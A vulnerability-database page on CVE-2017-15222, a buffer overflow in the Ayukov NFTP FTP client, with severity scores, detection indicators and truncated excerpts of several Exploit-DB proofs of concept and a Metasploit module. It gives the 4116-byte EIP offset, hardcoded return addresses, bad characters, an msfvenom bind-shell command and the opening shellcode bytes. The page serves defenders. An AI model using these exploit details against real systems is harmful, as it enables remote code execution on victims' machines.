CVE-2017-15222
published 2017-10-24CVE-2017-15222: Buffer Overflow vulnerability in Ayukov NFTPD 2.0 and earlier allows remote attackers to execute arbitrary code.
PriorityP267critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
60.33%
99.0th percentile
Buffer Overflow vulnerability in Ayukov NFTPD 2.0 and earlier allows remote attackers to execute arbitrary code.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nftp_project | nftp | <= 2.0 | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x20*4116 + [ret].pack('V') + nops(10) + payloadbytes↗
\xdd\xfc\x40\x00
bytes↗
\x10\xb3\x45\x7e
bytes↗
\x95\x3A\x92\x7c
bytes↗
\x43\x75\x92\x7C
bytes↗
\xc7\x41\xe6\x77
bytes↗
\xf3\x67\xe6\x77
- →The exploit is triggered by a malicious FTP server responding to the client's SYST request with an oversized buffer (>4116 bytes). Detect FTP SYST responses exceeding normal length (e.g., >256 bytes) from servers to clients. ↗
- →The EIP overwrite offset is exactly 4116 bytes into the SYST response buffer. A SYST response containing 4116+ bytes of padding followed by a return address is a strong exploit indicator. ↗
- →The Metasploit module uses 0x20 (space) characters as the initial padding in the overflow buffer. A SYST response beginning with thousands of space characters (0x20) is suspicious. ↗
- →Bad characters for shellcode encoding are \x00\x0A\x0D (and \x40 in some variants). Shellcode in the SYST response will avoid these bytes. ↗
- →The malicious FTP server sends a crafted 220 banner, accepts USER/PASS, then delivers the overflow payload in the SYST response followed by a 257 response. Monitor for rogue FTP servers on port 21 exhibiting this sequence. ↗
- →NOP sled patterns (\x90 repeated) appear immediately after the return address in all exploit variants. Detect NOP sleds in FTP SYST response payloads. ↗
- →The exploit spawns a bind shell (windows/shell_bind_tcp) on the victim. Monitor for unexpected listening TCP ports (4444, 5150) on FTP client machines after FTP connections. ↗
- ·Return addresses are OS/SP-specific and hardcoded to non-ASLR DLLs on Windows XP. The exploit does not work against systems with ASLR enabled. ↗
- ·The Metasploit module only targets Windows XP Pro SP3 English with GDI32.dll ret address 0x77f31d2f; other targets require different return addresses. ↗
- ·The null byte (\x00) in the call esp address from nftpc.exe terminates the overflow string, limiting reliability of that specific gadget. ↗
- ·The Metasploit module requires a StackAdjustment of -3500 for reliable payload execution. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Ayukov NFTP client 1.71 - 'SYST' Buffer Overflow
exploitdb·2019-11-04·CVSS 9.8
CVE-2017-15222 [CRITICAL] Ayukov NFTP client 1.71 - 'SYST' Buffer Overflow
Ayukov NFTP client 1.71 - 'SYST' Buffer Overflow
---
# Exploit Title: Ayukov NFTP client 1.71 - 'SYST' Buffer Overflow
# Date: 2019-11-03
# Exploit Author: Chase Hatch (SYANiDE)
# Vendor Homepage: http://ayukov.com/nftp/
# Software Link: ftp://ftp.ayukov.com/pub/nftp/nftp-1.71-i386-win32.exe
# Version: 1.71
# Tested on: Windows XP Pro SP0, SP1, SP2, SP3
# CVE : https://nvd.nist.gov/vuln/detail/CVE-2017-15222
# Steps to reproduce:
# Run the server with the valid Windows version
# Connect the client to the malicious server
# bind shell on port 5150
#!/usr/bin/env python2
import os, sys, socket
NARGS = len(sys.argv)
# ntdll.dll # dllcharacteristics flags: 0x0 (ASLR=no, DEP=no, SEH=yes)
# kernel32.dll # dllcharacteristics flags: 0x0 (ASLR=no, DEP=no, SEH=yes)
# 7C923A95 FFD6 CALL ESI # Wi
Exploit-DB
Ayukov NFTP FTP Client 2.0 - Buffer Overflow
exploitdb·2019-01-02·CVSS 9.8
CVE-2017-15222 [CRITICAL] Ayukov NFTP FTP Client 2.0 - Buffer Overflow
Ayukov NFTP FTP Client 2.0 - Buffer Overflow
---
# Exploit Title: Ayukov NFTP FTP Client 2.0 - Buffer Overflow
# Date: 2018-12-29
# Exploit Author: Uday Mittal
# Vendor Homepage: http://www.ayukov.com/nftp/
# Software Link: ftp://ftp.ayukov.com/pub/src/nftp-1.72.zip
# Version : below 2.0
# Tested on: Microsoft Windows XP SP3
# CVE: CVE-2017-15222
# EIP Location: 4116
# Buffer starts from : 4121
# 0x7e45b310 : jmp esp | {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll)
# badchars: '\x00\x0A\x0D\x40'
# Shellcode: msfvenom -p windows/shell_bind_tcp RHOST=192.168.43.72 LPORT=4444 -b '\x00\x0A\x0D' -f python
import socket
IP = '192.168.43.28'
port = 21
buf = ""
buf += "\xbb\x04\x8b\xfc\xf1\xd9\xc4\xd9\x74\
Exploit-DB
Ayukov NFTP FTP Client 2.0 - Remote Buffer Overflow (Metasploit)
exploitdb·2018-01-05
CVE-2017-15222 Ayukov NFTP FTP Client 2.0 - Remote Buffer Overflow (Metasploit)
Ayukov NFTP FTP Client 2.0 - Remote Buffer Overflow (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'Ayukov NFTP FTP Client Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability against Ayukov NFTPD FTP
Client 2.0 and earlier. By responding with a long string of data for the SYST request, it
is possible to cause a denail-of-service condition on the FTP client, or arbitrary remote
code exeuction under the context of the user if successfully exploited.
},
'Author' =>
[
'Berk Cem Goksel', # Original exploit author
'Daniel Teixeira', # MSF module author
'sinn3r' # RCA, improved module reliability and user exp
],
'
Exploit-DB
Ayukov NFTP FTP Client < 2.0 - Remote Buffer Overflow
exploitdb·2017-10-21·CVSS 9.8
CVE-2017-15222 [CRITICAL] Ayukov NFTP FTP Client < 2.0 - Remote Buffer Overflow
Ayukov NFTP FTP Client < 2.0 - Remote Buffer Overflow
---
#!/usr/bin/env python
# coding: utf-8
############ Description: ##########
# The vulnerability was discovered during a vulnerability research lecture.
# This is meant to be a PoC.
####################################
# Exploit Title: Ayukov NFTP FTP Client - Buffer Overflow
# Date: 2017-10-21
# Exploit Author: Berk Cem Göksel
# Contact: twitter.com/berkcgoksel || bgoksel.com
# Vendor Homepage: http://ayukov.com/nftp/source-release.html
# Software Link: ftp://ftp.ayukov.com/pub/nftp/
# Version: v1.71, v1.72, v1.8, v2.0
# Tested on: Windows 10
# Category: Windows Remote Exploit
# CVE : CVE-2017-15222
import socket
IP = '127.0.0.1'
port = 21
#(exec calc.exe)
shellcode=(
"\xda\xc5\xbe\xda\xc6\x9a\xb6\xd9\x74\x24\xf4\x5d\x2b\xc9\
Metasploit
Ayukov NFTP FTP Client Buffer Overflow
metasploit
Ayukov NFTP FTP Client Buffer Overflow
Ayukov NFTP FTP Client Buffer Overflow
This module exploits a stack-based buffer overflow vulnerability against Ayukov NFTPD FTP Client 2.0 and earlier. By responding with a long string of data for the SYST request, it is possible to cause a denail-of-service condition on the FTP client, or arbitrary remote code exeuction under the context of the user if successfully exploited.
No writeups or analysis indexed.
http://www.securityfocus.com/bid/101602https://www.exploit-db.com/exploits/43025/https://www.exploit-db.com/exploits/43448/https://www.exploit-db.com/exploits/46070/http://www.securityfocus.com/bid/101602https://www.exploit-db.com/exploits/43025/https://www.exploit-db.com/exploits/43448/https://www.exploit-db.com/exploits/46070/
2017-10-24
Published